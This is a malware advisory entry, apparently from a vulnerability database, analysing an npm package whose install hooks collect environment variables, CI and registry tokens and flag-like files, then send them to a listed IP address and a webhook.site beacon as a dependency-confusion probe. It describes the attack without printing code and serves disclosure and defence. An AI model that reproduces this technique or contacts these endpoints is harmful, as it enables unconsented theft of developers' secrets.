MAL-2026-6699

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (2a4dfa9f4805e5b44c7ccf3e4c3859abf8e9f0388f11e3daf6065f43c49e09ed) Package wires preinstall, install, and postinstall lifecycle hooks to run postinstall.js, which executes unconditionally on npm install. The script collects hostname, cwd, uid, and environment variables matching FLAG/CTF/NPM/REGISTRY/CI/GITHUB/RUNNER, reads candidate flag files, and uses child_process.execSync to recursively grep installer-side directories (/app, /workspace, /challenge, /home/runner/work/repo/repo,.,..,../..) for flag-shaped strings. The collected manifest is base64-encoded and PUT to http://154.57.164.76:30728/api/modules/<id>, with an additional GET beacon to webhook.site/755defab-ea42-4c1f-9804-43ec567439f5. postinstall.js also tests npm_config_registry against /verdaccio/i to detect successful dependency-confusion landings, and the shipped publish-and-arm.sh and README self-describe the package as an 'armed' dependency-confusion probe. Regardless of the CTF/probe framing, installing this package causes unconsented exfiltration of installer environment and filesystem contents to an attacker-controlled IP.